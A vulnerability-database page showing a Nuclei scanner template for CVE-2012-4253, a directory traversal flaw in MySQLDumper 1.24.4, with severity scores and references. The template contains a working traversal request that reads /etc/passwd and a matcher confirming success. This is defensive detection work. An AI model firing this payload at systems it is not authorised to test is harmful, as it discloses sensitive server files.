Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2012-4253
HistoryAug 01, 2021 - 12:33 a.m.

MySQLDumper 1.24.4 - Directory Traversal

2021-08-0100:33:05
ProjectDiscovery
github.com
7

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

7 High

AI Score

Confidence

Low

0.012 Low

EPSS

Percentile

85.0%

JSON

Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a … (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a … (dot dot) in the (3) config parameter to learn/cubemail/menu.php.

id: CVE-2012-4253

info:
  name: MySQLDumper 1.24.4 - Directory Traversal
  author: daffainfo
  severity: medium
  description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
  impact: |
    An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade to a patched version of MySQLDumper or apply the necessary security patches to fix the directory traversal vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/37129
    - https://nvd.nist.gov/vuln/detail/CVE-2012-4253
    - http://packetstormsecurity.org/files/112304/MySQLDumper-1.24.4-LFI-XSS-CSRF-Code-Execution-Traversal.html
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/75286
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/75283
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2012-4253
    cwe-id: CWE-22
    epss-score: 0.0179
    epss-percentile: 0.87805
    cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mysqldumper
    product: mysqldumper
  tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cf2959f6c0a7bd68f61e6edc7c0de5abc7e587704c1d8914f46c881f3ca118e402203faa0292a5e4bd71f7706588f37e2c754db8827daf38264dc97f26d3d473a380:922c64590222798bb761d5b6d8e72950

Related

prion 1
cvelist 1
nvd 1
cve 1
openvas 1
prion
prion
Directory traversal
2012-08-13 18:55:00
cvelist
cvelist
CVE-2012-4253
2012-08-13 18:00:00
nvd
nvd
CVE-2012-4253
2012-08-13 18:55:05
cve
cve
CVE-2012-4253
2012-08-13 18:55:05
openvas
openvas
MySQLDumper Multiple Vulnerabilities
2012-04-30 00:00:00

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

7 High

AI Score

Confidence

Low

0.012 Low

EPSS

Percentile

85.0%

JSON
Related for NUCLEI:CVE-2012-4253
prion1cvelist1nvd1cve1openvas1